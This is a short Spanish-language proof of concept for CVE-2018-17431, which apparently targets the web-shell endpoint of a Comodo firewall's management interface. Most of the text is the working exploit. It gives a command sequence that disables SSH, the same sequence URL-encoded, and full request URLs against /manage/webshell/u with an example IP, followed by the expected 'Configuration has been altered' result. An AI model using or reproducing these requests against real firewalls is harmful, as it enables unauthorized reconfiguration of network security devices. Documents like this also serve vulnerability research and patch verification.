
Prueba de consepto para CVE-2018-17431
Prueba de concepto para CVE-2018-17431
Exploit:
Simulación de WebShell:
Por ejemplo, deshabilitar SSH en el web shell es así:
- service [hit enter]
- ssh [hit enter]
- disable [hit enter]
Codificación
codifique la secuencia anterior con codificación URL
(usé el complemento de codificador de Burp)
%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a
Ejecución
URL base: https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=[Comando_Codificado]&l=[Integer]&_=1534440840152
https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=%0a&l=[Integer]&_=1534440840152 (tecla enter extra para ejecutar el comando)
Ejemplo: https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=21&_=1534440840152
https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%0a&l=21&_=1534440840152
Aparecerá una página con el mensaje "Configuration has been altered" y la configuración cambiará.